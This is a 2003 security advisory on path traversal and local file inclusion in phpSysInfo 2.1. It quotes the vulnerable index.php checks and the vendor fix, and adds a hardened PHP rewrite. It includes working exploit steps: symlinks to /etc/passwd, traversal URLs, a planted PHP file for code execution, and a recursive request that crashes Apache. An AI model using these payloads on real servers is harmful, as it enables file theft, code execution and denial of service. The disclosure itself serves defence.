[UNIX] Multiple Vulnerabilities Found in phpSysInfo
support_at_securiteam.com
Date: 04/28/03
To: list@securiteam.com Date: 28 Apr 2003 16:17:44 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Multiple Vulnerabilities Found in phpSysInfo
------------------------------------------------------------------------
SUMMARY
phpSysInfo (<http://phpsysinfo.sourceforge.net>) is "a little PHP script
destined to show system information. It shows data like CPU or memory
usage, Disk usage, PCI, Ethernet, and IDE information, etc". phpSysInfo
selects its template through the 'template' request variable and its
language file through the 'lng' request variable. Both variables can be
used to read files (and, in the case of PHP files, execute them) that
reside outside the web server's document root, and if a directory
traversal sequence (e.g. ../../../) is sent instead of a file name, a
denial of service is triggered on the server.
DETAILS
Vulnerable systems:
* phpSysInfo version 2.1 and prior
Immune systems:
* phpSysInfo version 2.1 (CVS updated) and above
To exploit this vulnerability an attacker needs write access to a local
directory that the web server can read from.
In the template's case, phpSysInfo only checks whether the template
exists (i.e. whether 'templates/$template' exists), not whether it lies
inside the templates directory.
---/ index.php /---
if (!((isset($template) && file_exists("templates/$template")) ||
      $template == 'xml')) {
    // default template we should use if we don't get an argument.
    $template = 'classic';
}
---/ index.php /---
A similar check is done for the language parameter:
---/ index.php /---
if (!(isset($lng) && file_exists('./includes/lang/' . $lng . '.php'))) {
    $lng = 'en';
    // see if the browser knows the right language.
    if (isset($HTTP_ACCEPT_LANGUAGE)) {
        $plng = split(',', $HTTP_ACCEPT_LANGUAGE);
        if (count($plng) > 0) {
            while (list($k, $v) = each($plng)) {
                $k = split(';', $v, 1);
                $k = split('-', $k[0]);
                if (file_exists('./includes/lang/' . $k[0] . '.php')) {
                    $lng = $k[0];
                    break;
                }
            }
        }
    }
}
---/ index.php /---
Since the 'template' variable is suffixed with predefined strings,
giving './templates/$template/form.tpl' and
'./templates/$template/box.tpl', these two file names must be symbolically
linked to whatever file is to be read.
Example:
local ~$ ln -s /etc/passwd /tmp/form.tpl
local ~$ ln -s /etc/passwd /tmp/box.tpl
http://vulnerable/index.php?template=../../../../tmp
Since the 'lng' variable is used in the following piece of code, a
different file name must be linked:
---/ index.php /---
require('./includes/lang/' . $lng . '.php'); // get our language include
---/ index.php /---
Example:
local ~$ ln -s /etc/passwd /tmp/p.php
http://vulnerable/index.php?lng=../../../../tmp/p
However, since the file is loaded through require() with a '.php'
extension, any PHP code placed in it is executed, so this also allows
arbitrary code execution.
Example:
First we need to create the file:
local ~$ echo "<?php phpinfo() ?>" > /tmp/p.php
And then request it:
http://vulnerable/index.php?lng=../../../../tmp/p
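Both vectors share one root cause: file_exists() on an attacker-controlled path that is never confined to a single name inside the intended directory. The following is an added example of a hardened replacement for the two checks quoted above; it is not phpSysInfo's own code and assumes the same layout (./templates/<name>/{form,box}.tpl and ./includes/lang/<name>.php).

```php
<?php
// Added example, not phpSysInfo's own code. Assumes the advisory's layout:
// ./templates/<name>/{form,box}.tpl and ./includes/lang/<name>.php.
// Only one plain path component: no '/', '..', NUL or absolute paths.
function is_plain_name(string $name): bool {
    return (bool) preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name);
}

// Second line of defence: the resolved regular file must still sit under
// $baseDir. realpath() follows symlinks, so templates/x/form.tpl -> /etc/passwd fails.
function resolve_inside(string $baseDir, string $relPath): ?string {
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . $relPath);
    if ($base === false || $full === false || !is_file($full)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

function pick_template(?string $requested): string {
    if ($requested === 'xml') {
        return 'xml';
    }
    if ($requested !== null && is_plain_name($requested)
        && resolve_inside('templates', "$requested/form.tpl") !== null
        && resolve_inside('templates', "$requested/box.tpl") !== null) {
        return $requested;
    }
    return 'classic'; // default, as in the original
}

// Browser preferences ("de-DE,de;q=0.8,en;q=0.5") get the same two checks.
function pick_language(?string $requested, string $acceptLanguage): string {
    $candidates = $requested === null ? [] : [$requested];
    foreach (explode(',', $acceptLanguage) as $entry) {
        $tag = strtolower(trim(explode(';', $entry, 2)[0]));
        $candidates[] = explode('-', $tag, 2)[0];
    }
    foreach ($candidates as $c) {
        if (is_plain_name($c) && resolve_inside('includes/lang', "$c.php") !== null) {
            return $c;
        }
    }
    return 'en';
}

$template = pick_template($_GET['template'] ?? null);
$lng = pick_language($_GET['lng'] ?? null, $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '');
require './includes/lang/' . $lng . '.php';
```

The name filter alone rejects every traversal string shown in this advisory, including a self-referencing 'lng' value that would make index.php require itself; the realpath() prefix test is kept so that a symlink planted inside the templates directory cannot point the include outside it either.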
Vendor response:
In bug report #670222 I described the same problem and how to use it to
DoS the host. Calling "index.php?lng=../../index" creates a runaway
recursive loop, creating a huge load and finally crashing the Apache
process. This can easily be used to DoS a web server.
http://sourceforge.net/tracker/index.php?func=detail&aid=670222&group_id=15&atid=100015
On 19 January my fix for this problem has been incorporated in the CVS
repository. This also fixes the problems described in Albert Puigsech
Galicia's report.
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/phpsysinfo/phpsysinfo-dev/index.php.diff?r1=1.56&r2=1.57
phpSysInfo 2.1 is vulnerable; the CVS versions after 19 January are not.
ADDITIONAL INFORMATION
The information has been provided by <mailto:ripe@7a69ezine.org> Albert
Puigsech Galicia and <mailto:security@wkamphuis.student.utwente.nl>
Wolter Kamphuis.
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.